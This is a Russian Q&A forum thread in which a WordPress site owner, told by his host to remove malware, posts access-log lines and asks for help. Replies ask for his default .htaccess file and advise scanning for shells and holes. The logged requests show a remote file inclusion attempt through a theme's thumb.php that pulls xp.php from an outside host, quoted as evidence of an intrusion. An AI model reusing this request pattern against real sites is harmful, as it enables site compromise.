Задать вопрос
@dmmestny

Как удалить вредоносные файлы botnet_hack.txt WordPress?

Здравствуйте.
Сайт на CMS WordPress
Хостинг прислал письмо чтобы я удалил вредоносные файлы и заблокировал сайт.
В переписке удалось получить лог:
111.11.11.111 - - [21/Feb/2014:20:35:49 +1100] "GET =
/botnet_hack.txt/wp-content/themes/boldnews/thumb.php?src=3Dhttp%3A%2F%2F=
flickr.com.yarovoiy.ru%2Fxp.php HTTP/1.1" 200 16813

111.11.11.111 - - [21/Feb/2014:20:35:49 +1100] "GET =
/botnet_hack.txt/wp-content/themes/boldnews/thumb.php?src=3Dhttp%3A%2F%2F=
flickr.com.yarovoiy.ru%2Fxp.php HTTP/1.1" 200 16813 "-" "Mozilla/5.0 =
(Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 =
Firefox/3.6"

111.11.11.111 - - [21/Feb/2014:20:35:49 +1100] "GET =
/wp-content/themes/boldnews/thumb.php?src=3Dhttp%3A%2F%2Fflickr.com.yarov=
oiy.ru%2Fxp.php HTTP/1.1" 200 16813

111.11.11.111 - - [21/Feb/2014:20:35:49 +1100] "GET =
/wp-content/themes/boldnews/thumb.php?src=3Dhttp%3A%2F%2Fflickr.com.yarov=
oiy.ru%2Fxp.php HTTP/1.1" 200 16813 "-" "Mozilla/5.0 (Windows; U; =
Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

111.11.11.111 - заменил реальный IP сайта.

Причем тут сайт yarovoiy .ru я вообще не пойму
И темы boldnews не имеется даже папки такой
Помогите пожалуйста разобраться как это исправить.
Спасибо
  • Вопрос задан
  • 2335 просмотров
Подписаться 2 Оценить Комментировать
Пригласить эксперта
Ответы на вопрос 3
Scorpi
@Scorpi
Скидывайте файл .htaccess
Ответ написан
Комментировать
@dmmestny Автор вопроса
# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress
Ответ написан
Комментировать
@aterentyev
Возможно вам загрузили эту тему и файл botnet_hack.txt а потом удалили, надо проверять сайт на наличие шелов, уязвимостей, просканировать фтп.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы